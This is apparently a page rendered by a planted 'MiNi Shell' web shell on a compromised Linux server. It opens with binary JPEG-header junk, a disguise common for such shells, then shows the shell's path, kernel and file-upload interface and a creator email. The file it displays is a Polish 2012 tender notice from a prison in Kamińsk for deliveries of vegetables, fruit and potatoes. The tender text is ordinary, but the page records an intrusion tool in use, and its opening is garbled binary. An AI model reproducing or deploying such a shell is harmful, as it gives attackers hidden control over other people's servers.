JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121011/394268-N-2012.html

<p class="kh_header"><b>Kamińsk: Przedmiotem zamówienia są sukcesywne dostawy do magazynu żywnościowego Zamawiającego świeżych warzyw i owoców z odmian późnych.</b><br>
<b>Numer ogłoszenia: 394268 - 2012; data zamieszczenia: 11.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Kamińsku , ul. XXX - lecia 1, 11-227 Kamińsk, woj. warmińsko-mazurskie, tel. 089 7617400, faks 089 7617444.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Porządek i bezpieczeństwo publiczne. Więziennictwo.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia są sukcesywne dostawy do magazynu żywnościowego Zamawiającego świeżych warzyw i owoców z odmian późnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres poszczególnych części zamówienia oraz wymagania Zamawiającego odnośnie przedmiotu zamówienia:
CZĘŚĆ I
1)	Cebula biała w ilości 18 000 kg;
2)	Burak ćwikłowy w ilości 16 000 kg;
3)	Marchew bez naci w ilości 17 000 kg;
4)	Kapusta biała w ilości 12 000 kg;
5)	Seler korzeń bez naci w ilości 5 500 kg;
6)	Pietruszka korzeń bez naci w ilości 5 000 kg;
7)	Por w ilości 5 500 kg;

CZĘŚĆ II
1)Kapusta kiszona w ilości 11 000 kg;
2)Ogórek kwaszony w ilości 11 000 kg;

CZĘŚĆ III
Jabłka tegoroczne z odmian półsłodkich w ilości 25 000 kg;

CZĘŚĆ IV
Ziemniaki jadalne z odmian późnych w ilości 150 000 kg.

2.Opis przedmiotu zamówienia z podziałem na części.
2.1. Część I

CEBULA BIAŁA - musi być dostarczona w stanie świeżym z odmian późnych - pochodząca 
z odpowiednich gleb, nie przenawożona i zebrana w odpowiednim terminie agrotechnicznym.
Wymagania jakościowe :
1)	wygląd: czysta, zdrowa, bez uszkodzeń, jędrna, dojrzała, z szyjką zaschniętą, okryta co najmniej dwiema warstwami suchej łuski, w tym jednej nie popękanej;
2)	kształt : kulisty lub lekko spłaszczony; 
3)	barwa : łuski suchej - jasnożółta do jasnobrązowej.
4)	barwa:  łuski mięsistej - kremowa lub kremowo zielonkawa;
5)	korzenie : całkowicie zaschnięte;
6)	powinna być zachowana jednolitość odmiany, średnica nie mniej niż 4 cm.	
Przeznaczenie: do spożycia w stanie świeżym oraz przechowywania zimowego.
BURAKI ĆWIKŁOWE - muszą być dostarczone w stanie świeżym, z odmian późnych pochodzące z odpowiednich gleb, nie przenawożone i zebrane w odpowiednim terminie agrotechnicznym.
Wymagania jakościowe :
1)	wygląd korzeni: czyste, bez uszkodzeń, kształt kulisty lub lekko spłaszczony charakterystyczny dla danej odmiany;
2)	zabarwienie przekroju : ciemnoczerwone;
3)	średnica korzeni od 6 cm. 
Przeznaczenie: do spożycia w stanie świeżym oraz przechowywania zimowego.
MARCHEW - bez naci, musi być dostarczona w stanie świeżym z odmian późnych - pochodząca z odpowiednich gleb, nie przenawożona i zebrana we właściwym terminie agrotechnicznym.
Wymagania jakościowe:
1)	korzenie marchwi muszą być : zdrowe, całe, czyste, jędrne, nie popękane, bez bocznych rozgałęzień lub rozwidleń;
2)	barwa korzeni marchwi musi być : jednolita, typowa dla odmiany; 
3)	kształt marchwi musi być: o kształcie stożkowym, gładkim o świeżym wyglądzie.
4)	nie może zawierać domieszek innych odmian - musi być zachowana jednolitość odmiany; 
5)	średnica mierzona w najszerszym przekroju od 4 cm.;
6)	nie dopuszcza się korzeni o żółtym zabarwieniu;
7)	marchew musi być wolna od nadmiernego zawilgocenia powierzchniowego.
Przeznaczenie: do spożycia w stanie świeżym oraz przechowywania zimowego.
KAPUSTA BIAŁA  - musi być dostarczona w stanie świeżym z odmian późnych - pochodząca 
z odpowiednich gleb, nie przenawożona i zebrana we właściwym terminie agrotechnicznym. 
Wymagania jakościowe:
1) wygląd główek: całe, świeże, czyste, zdrowe, jędrne, z liśćmi przyciętymi, prawidłowo wykształcone, okrągłe i ścisłe, o świeżym wyglądzie z usuniętymi zwiędniętymi liśćmi;
2) jednolitość: jednolite odmianowo, zbliżone pod względem wielkości i średnicy, średnica 
nie mniejsza niż 20 cm .
Przeznaczenie: do spożycia w stanie świeżym oraz przechowywania zimowego.
SELER - bez naci, musi być dostarczony w stanie świeżym, z odmian późnych - pochodzących 
z odpowiednich gleb, nie przenawożony i zebrany w odpowiednim terminie agrotechnicznym.  
Wymagania jakościowe :
1) wygląd korzeni: całe, czyste, zdrowe, kształtne, niezwiędnięte, nie sparciałe, z krótko przyciętymi korzeniami bocznymi, o miąższu białym lub kremowo - białym bez pustych komór wewnętrznych, 
2) średnica korzeni od 10 cm,
Przeznaczenie: do spożycia w stanie świeżym oraz przechowywania zimowego.
PIETRUSZKA - bez naci, musi być dostarczona w stanie świeżym, z odmian późnych  - pochodzących z odpowiednich gleb, nie przenawożona i zebrana w odpowiednim terminie agrotechnicznym.  
Wymagania jakościowe :
1)	wygląd korzeni : całe, czyste, zdrowe, kształtne, niezwiędnięte, nie sparciałe, bez rozgałęzień i narośli;
2)	zabarwienie charakterystyczne dla danej odmiany;
3)	średnica korzeni w najszerszym miejscu od 3 cm.
4)	do spożycia oraz przechowywania zimowego.
Przeznaczenie: do spożycia w stanie świeżym oraz przechowywania zimowego.
POR - musi być dostarczony w stanie świeżym z odmian późnych - pochodzący z odpowiednich gleb, nie przenawożony i zebrany we właściwym terminie agrotechnicznym. 
Wymagania jakościowe :
1)	wygląd: cały, świeży, czysty, zdrowy, jędrny, z liśćmi przyciętymi do długości nie przekraczającej 2 długości części wybielonej (cebuli rzekomej), prawidłowo wykształcony, prosty i ścisły, o świeżym wyglądzie z usuniętymi zwiędniętymi lub uschniętymi liśćmi;
2)	jednolity odmianowo, zbliżony pod względem wielkości i średnicy, średnica części wybielonej nie mniejsza niż 2 cm.
Przeznaczenie: do spożycia w stanie świeżym oraz przechowywania zimowego.

2.2. Część II
KAPUSTA KISZONA - musi być zebrana we właściwym terminie agrotechnicznym, pochodząca z odpowiednich gleb, nie przenawożona.
Wymagania jakościowe: 
1)	barwa kapusty kiszonej musi być: biała do kremowej - jednolita, nie dopuszcza się kapusty o żółtym zabarwieniu;
2)	nie może zawierać domieszek innych odmian;
3)	kształt zewnętrzny na przekroju - skrawki nitkowate, podłużne;
4)	konsystencja , wrażenie w dotyku - skrawki muszą być jędrne i chrupkie;
5)	smak - kwaskowy, charakterystyczny dla kapusty kiszonej.
Opakowanie i oznakowanie: kapusta kiszona powinna być pakowana w pojemniki ( beczki plastikowe) posiadające atest PZH na możliwość kontaktu z żywnością o  wadze (sucha masa - bez jej zalewy) od 80 kg do 100 kg netto, które będą zwracane po ich opróżnieniu.
	OGÓRKI KWASZONE - muszą być zebrane we właściwym terminie agrotechnicznym, pochodzące  z odpowiednich gleb, nie przenawożone. 
Wymagania jakościowe: 
1)	wygląd: całe, pełne w środku: jednolite odmianowo;
2)	 zbliżone pod względem wielkości i średnicy.
Opakowanie i oznakowanie: ogórki kwaszone powinny być pakowane w pojemniki (beczki plastikowe) posiadające atest PZH na możliwość kontaktu z żywnością o wadze masy netto     od 100 kg do 120 kg, które będą zwracane po ich opróżnieniu. 

2.3. Część III
JABŁKA z odmian półsłodkich- muszą być zebrane we właściwym terminie agrotechnicznym, pochodzące z odmian późnych. 
Wymagania jakościowe :
1)	dostarczone w stanie świeżym, z odmian odpowiednich do pory roku;
2)	odmiany jabłek półsłodkich,   
3)	owoce: zdrowe, całe, czyste, jędrne, nie popękane, dojrzałe, nie przemarznięte;
4)	barwa jednolita, typowa dla odmiany; 
5)	kształt owocu: kształtne, niezwiędnięte o gładkim i świeżym wyglądzie;
6)	dostawa partii przedmiotu zamówienia jednolita pod względem gramatury i wyglądu, nie może zawierać domieszek innych odmian - musi być zachowana jednolitość odmiany średnica mierzona w najszerszym przekroju poprzecznym od 6 cm, waga 1 sztuki od 100 g do 150 g ;
7)	smak i zapach charakterystyczny dla w/w owoców, bez posmaków i zapachów obcych;
8)	owoce wolne od nadmiernego zawilgocenia powierzchniowego;
    
2.4. Część IV
ZIEMNIAKI JADALNE PÓŹNE - muszą być dostarczone w stanie świeżym, powinny pochodzić z odpowiednich gleb lżejszych, racjonalnie nawożonych mineralnie (nieprzenawożone azotem), zebrane we właściwym terminie agrotechnicznym, przechowywane w temperaturze i wilgotności powietrza zalecanej dla danego gatunku.
Wymagania jakościowe :
1)	wygląd bulwy ziemniaka: okrągło - owalny, kształtny (regularny charakterystyczny dla danej odmiany), skórka mocna i gładka, czysta bez uszkodzeń mechanicznych, muszą być dojrzałe, zdrowe, suche, nie zazielenione;
2)	zabarwienie przekroju: miąższ kremowy o małej zdolności do ciemnienia bulw surowych a tym samym po dokonaniu obróbki termicznej;
3)	musi być zachowana jednolitość odmiany tj: tego samego pochodzenia, tej samej odmiany, jakości i wielkości;
4)	wymagana średnica: poprzeczna min. 5,0 cm i podłużna min. 7,5 cm .

3. Inne wymagania odnośnie zamawianego powyżej asortymentu.

1) Przedmiot zamówienia - musi być dobrej jakości, o dobrych walorach smakowych, zapach  
    charakterystyczny dla w/w artykułów;
2) Dostawa partii przedmiotu zamówienia - kształtem i wielkością jednolite pod względem   
     gramatury, musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej  
     jakości i wielkości, w ramach jednej dostawy.
3) Jednostkowe opakowanie i oznakowanie dostawy:
  opakowania - wszystkie opakowania muszą być dopuszczone do kontaktu z żywnością, posiadać atest PZH na możliwość kontaktu z żywnością, warzywa powinny zostać dostarczone w jednorazowych bezzwrotnych workach (ażurowych) o wadze 25 kg lub 30 kg netto bezzwrotne, bądź pojemnikach (skrzynki drewniane lub plastikowe oraz beczki plastikowe), które będą zwracane po ich opróżnieniu.
oznakowanie - powinno zawierać: nazwę producenta lub dostawcy - adres, nazwę artykułu  spożywczego, a etykieta powinna uwzględniać, wagę danego produktu, warunki przechowywania, datę i termin przydatności do spożycia (należy spożyć do... rok/miesiąc/dzień);
4) Minimalny termin przydatności do spożycia: od dnia dostawy na w/w artykuły musi wynosić minimum 3 miesiące (licząc termin od dnia dostawy)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.00-7, 03.22.14.00-0, 03.22.23.21-9, 03.21.21.00-1, 15.33.10.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, gdy Wykonawca wykaże się spełnieniem tego warunku składając oświadczenie - Załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, gdy Wykonawca wykaże się spełnieniem tego warunku składając oświadczenie - Załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, gdy Wykonawca wykaże się spełnieniem tego warunku składając oświadczenie - Załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, gdy Wykonawca wykaże się spełnieniem tego warunku składając oświadczenie - Załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, gdy Wykonawca wykaże się spełnieniem tego warunku składając oświadczenie - Załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Poprawnie wypełniony Formularz ofert cenowej stanowiący Załącznik nr 1 do SIWZ.
2. Pełnomocnictwo udzielane osobom podpisującym ofertę, o ile prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Kamińsku
ul. XXX - lecia PRL 1, Kamińsk
11 - 220 Górowo Iławeckie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2012 godzina 10:30, miejsce: Zakład Karny w Kamińsku
ul. XXX - lecia PRL 1, Kamińsk
11 - 220 Górowo Iławeckie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com